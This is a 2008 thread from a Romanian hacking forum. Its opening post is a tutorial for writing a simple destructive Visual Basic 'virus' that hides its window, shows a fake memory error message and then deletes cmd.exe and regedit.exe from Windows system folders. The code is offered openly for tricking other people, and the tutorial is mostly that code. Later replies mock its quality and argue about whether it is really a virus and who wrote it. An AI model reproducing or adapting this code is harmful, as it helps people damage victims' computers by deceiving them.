Proxenon Posted April 24, 2008 Report Posted April 24, 2008 Pai majoritatea cred ca virusii se aseamana cu Trojanii lucru deloc adevarat.Un virus nu este asa de imposibil de realizat odata ce intelegeti diferentele dintre Trojani si Virusi.O sa incepem cu ceva foarte simplu.Acum totul depinde de cum vrei tu ca virusul tau sa lucreze, Eu sunt de parere ca cel mai bine e ca el sa se activeze odata cu deschiderea aplicatiei asa ca main code se codeaza in form load sub.In proiectul nostru inseram un text box , un buton de comanda si un timer,vom folosii butonul si timerul putin mai incolo.Acest exemplu de virus sterge ceva anume acum vom adauga ce anume sterge in cod.Code: Private Sub Form_Load() Text1.Text = "C:/Windows/System32/cmd.exe Kill Text1.Text End SubAcest cod explica cum odata deschisa aplicatia se sterge cmd.exe din System32 automat.Acum vom pune si un buton il vom denumi "A"Pune urmatorul cod in butoul de comanda si in form load.Code: Private Sub Form_Load() Text1.Text = "C/Windows/System32/cmd.exe" A = Text1.Text End Sub Private Sub Command1_Click Kill A End SubAsa.... odata ce butonul va fii apasat va sterge cmd.exeAcum la codul urmator vom folosii timer.Code: Private Sub Form_Load() Form1.Visible = False Text1.Text = "C:/Windows/System32/cmd.exe" A = Text1.Text Msgbox ("Runtime Error 492. Not Enough Memory."), vbCritical, "Runtime Error" End Sub Private Sub Timer1_Timer() Timer1.Interval = 5000 Kill A Timer1.Enabled = False End SubCeea ce am facut mai sus este sa facem formul invizibil si sa dea un mesaj eroare ce pare a fii real, am setat intervalul la 5 secunde pana ce fisierul va fii sters si vedeti cat de simplu este sa pacaliti pe cineva.Codul de jos nu va folosii timere butoane va da un mesaj error dupa care pur si simplu va sterge mai multe fisiere.Code:Private Sub Form_Load() Form1.Visible = False Msgbox ("Runtime Error 492. Not Enough Memory."), vbCritical, "Runtime Error" Kill "C:/Windows/System32/cmd.exe" s Kill "C:/Windows/regedit.exe" End SubAcesta va sterge regedit.exe si cmd.exe si va spune Runtime Error 492. Not Enough Memory ( il puteti personaliza cu ce doriti )Succes. Quote
SirGod Posted April 24, 2008 Report Posted April 24, 2008 sterge tu regedit.exe si vezi ca in 10 secunde apare la loc.whatever,e buna ideea de tutorial dar puteai da alte exemple... Quote
loki Posted April 24, 2008 Report Posted April 24, 2008 vorbesti de wormi sau virusi? virusii infecteaza un exe deja existent, introducandu-se in el; wormii si troienii sunt programe de sine statatoare. Quote
Hertz Posted April 24, 2008 Report Posted April 24, 2008 Stati flexati.Nu el a facut tutorialul@ Quote
______ Posted April 24, 2008 Report Posted April 24, 2008 Stati flexati.Nu el a facut tutorialul@Din cate a postat pana acum se vede k nu a facut nici un tutorial el ...Cred k o sa ia ban , nici macar sursa de una a luat nu a pus-o sau sa dea credit , whatever (cred k cere singur) Quote
Nytro Posted April 25, 2008 Report Posted April 25, 2008 Daca un program care sterge un fisier e virus ... Ca sa nu mai spun cat de prost e scris :Private Sub Timer1_Timer() Timer1.Interval = 5000 Kill A Timer1.Enabled = False End Sub Quote
loki Posted April 25, 2008 Report Posted April 25, 2008 el cred ca tine pentru el rutina de inmultire si infectare a vbs-urilor prn*.vbs de prin system32. Quote
samfingcul Posted May 30, 2008 Report Posted May 30, 2008 Stati flexati.Nu el a facut tutorialul@salut. nu vad de ce e asa important daca e facut de el tutorialul sau nu.omu' a share-uit ce stie si el fie ca a preluat de undeva sau nu.dar am impresia ca e o chestie tipic romaneasca, daca unu zice ceva, se va gasi cineva sa-i sara in cap. bleah.. Quote
Nytro Posted May 30, 2008 Report Posted May 30, 2008 Nu conteaza cine l-a facut , e o mare porcarie . Quote